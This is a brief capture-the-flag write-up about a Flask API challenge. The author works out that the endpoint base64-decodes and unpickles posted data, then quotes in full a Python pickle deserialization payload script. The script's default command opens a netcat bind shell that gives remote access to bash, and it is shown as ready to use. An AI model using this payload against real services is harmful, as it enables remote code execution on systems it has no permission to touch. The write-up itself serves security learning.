APIv2 @ 2020 - You think you got methods for this? ---> POSt method
The POST request returns a flask error which occurred because no data was sent.
I added :D as payload and got a new error.
It tries to b64decode my input.
Description:
A rundown, informally known as a pickle or the hotbox, is a situation in the game of baseball that occurs when the baserunner is stranded
The description and the presence of the b64 error suggest that pickle was used.
basic pickle payload from
https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import sys
import base64
DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
def __reduce__(self):
import os
return (os.system,(COMMAND,))
print (base64.b64encode(cPickle.dumps(PickleRce())))
Using the output of this script as payload returned a response which says that no space is allowed.